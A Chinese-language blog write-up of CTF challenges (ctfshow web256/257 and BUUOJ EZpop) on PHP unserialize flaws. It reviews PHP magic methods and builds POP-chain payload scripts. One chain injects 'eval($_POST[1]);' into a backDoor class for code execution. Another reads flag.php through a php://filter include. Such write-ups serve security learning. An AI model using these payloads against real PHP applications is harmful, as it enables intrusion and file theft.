PHP serialize&unserialize Study writeup(2)

前言

继续学习吧,希望我们能一起学习,在家好蔫,

本篇文章主要主要讲的是靶场的PHP反序列化的一些题

复习一下魔术方法

__construct() 当一个对象创建的时候被调用 _

_destruct() 当一个对象销毁的时候被调用

__toString() 当一个对象被当作字符串使用的时候被调用

__invoke 当尝试以调用函数的方式调用一个

对象时,会被调用

__sleep() 当对象在被序列化之前运行

__wakeup() 当在被反序列化之后调用

__get() 访问私有变量或不存在的变量均会触发

__set() 给私有变量或不存在的变量赋值时,会触发

__unset 对私有变量或不存在的变量调用unset时,会触发

WEB 256

图片[1],PHP serialize&unserialize Study writeup(2),网络安全爱好者中心-神域博客网
图片[2],PHP serialize&unserialize Study writeup(2),网络安全爱好者中心-神域博客网

与上一个题唯一不同的地方

<?php
class ctfShowUser{
    public $username='xxxxxx';
    public $password='godyuu';
    public $isVip=True;
}
$user = new ctfShowUser();
$u=serialize($user);
print $u."\n";
$u1=unserialize($u);
print_r ($u1);
?>
图片[3],PHP serialize&unserialize Study writeup(2),网络安全爱好者中心-神域博客网

Web257

图片[4],PHP serialize&unserialize Study writeup(2),网络安全爱好者中心-神域博客网
图片[5],PHP serialize&unserialize Study writeup(2),网络安全爱好者中心-神域博客网

没有对username和password进行判断 只要输入即可

期中突破点

图片[6],PHP serialize&unserialize Study writeup(2),网络安全爱好者中心-神域博客网

我们知道我们只能修改属性而不能修改方法(增添调用方法)

我们的目的就是想尽设法从外部调用function getInfo()函数 因为在backDoor里并没有直接调用backDoor函数

从哪里调用?当然是从ctfShowUser中的construct构建一个->再在destruct里再调用

图片[7],PHP serialize&unserialize Study writeup(2),网络安全爱好者中心-神域博客网

我认为有一个CTFshow的用户讲解的很好

图片[8],PHP serialize&unserialize Study writeup(2),网络安全爱好者中心-神域博客网

那么开始构造pop链吧

<?php
class ctfShowUser{
    private $username='xxxxxx';
    private $password='xxxxxx';
    private $isVip=false;
    private $class = 'info';

    public function __construct(){
        $this->class=new backDoor();
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
        $this->class->getInfo();
    }

}

class info{
    private $user='xxxxxx';
    public function getInfo(){
        return $this->user;
    }
}

class backDoor{
    private $code='eval($_POST[1]);';
    public function getInfo(){
        eval($this->code);
    }
}
$a=new ctfShowUser();
echo (urlencode(serialize($a)));
?>
图片[9],PHP serialize&unserialize Study writeup(2),网络安全爱好者中心-神域博客网

BUUOJ->EZpop

图片[10],PHP serialize&unserialize Study writeup(2),网络安全爱好者中心-神域博客网

这个比ctfshow上难度

图片[11],PHP serialize&unserialize Study writeup(2),网络安全爱好者中心-神域博客网


图片[12],PHP serialize&unserialize Study writeup(2),网络安全爱好者中心-神域博客网

以下是我的分析

图片[13],PHP serialize&unserialize Study writeup(2),网络安全爱好者中心-神域博客网

构造POP链

<?php
class Modifier {
    protected  $var="php://filter/convert.base64-encode/resource=flag.php";
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}
$a=new Show();
$a->source=$a;
$a->str=new Test();
$a->str->p=new Modifier();

var_dump($a);
var_dump(urlencode(serialize($a)));
?>
图片[14],PHP serialize&unserialize Study writeup(2),网络安全爱好者中心-神域博客网
------本文已结束,感谢您的阅读------
THE END
喜欢就支持一下吧
点赞9 分享
评论 抢沙发
头像
善语结善缘,恶语伤人心
提交
头像

昵称

取消
昵称常用语 夸夸
夸夸
还有吗!没看够!
表情图片

    暂无评论内容